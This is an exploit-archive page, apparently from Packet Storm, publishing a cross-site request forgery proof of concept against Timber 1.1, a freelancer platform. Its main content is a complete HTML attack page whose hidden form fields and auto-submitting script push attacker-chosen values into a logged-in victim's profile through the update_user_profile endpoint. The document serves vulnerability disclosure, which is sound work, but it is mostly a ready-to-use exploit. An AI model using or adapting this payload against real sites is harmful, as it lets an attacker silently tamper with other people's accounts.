exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Timber 1.1 Cross Site Request Forgery

Timber 1.1 Cross Site Request Forgery
Posted May 24, 2018
Authored by Borna Nematzadeh

Timber version 1.1 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 98125c64ad8f40b05398adc5800e2dcda0ab9d8c496cb8cbce6e95222d1a2baf

Timber 1.1 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: Timber - Ultimate Freelancer Platform  1.1 - Cross site request forgery
# Date: 2018-05-24
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Vendor Homepage:
https://codecanyon.net/item/timber-ultimate-freelancer-platform/14747284?s_rank=1717
# Version: 1.1
# Tested on: Kali linux
=========================================

# POC :

<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://test.com/timber/request/backend/ajax/profile/update_user_profile" method="POST">
<input type="hidden" name="user_nonce" value="e748717abd" />
<input type="hidden" name="profile_avatar" value="" />
<input type="hidden" name="first_name" value="decode" />
<input type="hidden" name="last_name" value="lord" />
<input type="hidden" name="user_name" value="test" />
<input type="hidden" name="job" value="Marketing Specialist" />
<input type="hidden" name="company" value="Envato" />
<input type="hidden" name="email" value="lord@decode.com" />
<input type="hidden" name="website" value="http://envato.com" />
<input type="hidden" name="language" value="en_US" />
<input type="hidden" name="phone_num" value="+33 (0)1 42 68 53 00" />
<input type="hidden" name="country" value="FR" />
<input type="hidden" name="city" value="Paris" />
<input type="hidden" name="address1" value="8 Rue de Londres" />
<input type="hidden" name="address2" value="75009 test" />
<input type="hidden" name="zip_code" value="" />
<input type="hidden" name="vat_nubmer" value="" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

==========================================

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close